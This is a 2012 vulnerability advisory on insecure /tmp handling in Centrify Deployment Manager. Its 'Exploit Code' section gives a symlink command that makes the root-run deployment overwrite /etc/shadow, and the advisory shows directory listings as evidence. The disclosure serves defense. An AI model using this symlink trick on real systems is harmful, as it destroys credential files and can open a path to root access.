Advisory #: 28
Title: Centrify Deployment Manager v2.1.0.283 /tmp file clobbering vulnerability
Author: Larry W. Cashdollar, @_larry0
Date: 2012-12-03
CVE-ID:[CVE-none]
CWE:
Download Site: http://www.centrify.com/
Vendor: Centrify
Vendor Notified: 2012-12-03
Vendor Contact: info@centrify.com
Advisory: http://www.vapid.dhs.org/advisories/centrify_deployment_manager_insecure_tmp.html
Description:
Vulnerability:
While at a training session for centrify, I noticed poor handling of files in /tmp. I was able to overwrite /etc/shadow with the contents of adcheckDMoutput. I am sure there are more vulnerabilities to be exploited, maybe a local root - but being this is a training class I should probably pay attention. total 6680 -rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210 -rw-rw-r-- 1 clyde clyde 188 Dec 3 14:41 centrify.cmd.210 -rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh [root@engnew-cen tmp]# ls -l total 6680 -rw-rw-rw- 1 root root 3999 Dec 3 14:41 adcheckDMoutput -rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210 -rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh [root@engnew-cen tmp]# ls -l total 6688 -rw-rw-rw- 1 root root 3999 Dec 3 14:41 adcheckDMoutput -rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210 -rwxr-xr-x 1 clyde clyde 132 Dec 3 14:41 centrify.cmd.210 -rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh [root@engnew-cen tmp]# ls -l total 6672 -rwxr-xr-x 1 clyde clyde 6790300 Dec 3 14:41 adcheck-rhel3-i386.210 -rwxr-xr-x 1 root root 187 Dec 3 14:18 engnew-cen.sh
Export: JSON TEXT XML
Exploit Code:
  1. $ nobody> ln -s /etc/shadow adcheckDMoutput
  2. # ls -l /etc/shadow
  3. -r-------- 1 root root 3999 Dec 3 14:56 /etc/shadow
  4. /etc/shadow has been overwritten with the contents of adcheckDMoutput, which is generated when software is pushed to a host via Deployment Manager.
  5. The 210 appended to the end of files in /tmp is the users UID number.
Screen Shots:
Notes:
88166